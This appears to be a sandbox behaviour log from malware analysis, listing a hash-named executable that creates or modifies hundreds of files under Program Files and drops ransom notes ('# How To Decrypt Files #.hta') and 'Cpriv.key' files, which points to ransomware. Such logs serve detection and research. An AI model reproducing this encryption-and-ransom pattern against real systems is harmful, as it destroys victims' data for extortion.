de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\11.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXPTOOWS.XLA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHDHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\BRANDING.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205582.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTOC.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02088_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01255G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECRECS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\LightSpirit.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01585_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\STRTEDGE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\81.0.4044.129\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18189_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BlackRectangle.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\CAGCAT10.MML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\APA.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143754.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01157_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\HEADINGBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14868_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115844.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\form_edit.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MUSIC_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15275_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GREET11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239967.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL027.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21297_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04225_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099175.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\applet\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TextConv\RECOVR32.CNV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\Accessories\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115866.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Status.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_bullets.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mousedown.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14800_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL093.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OIS.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\fieldswitch.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01749_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png 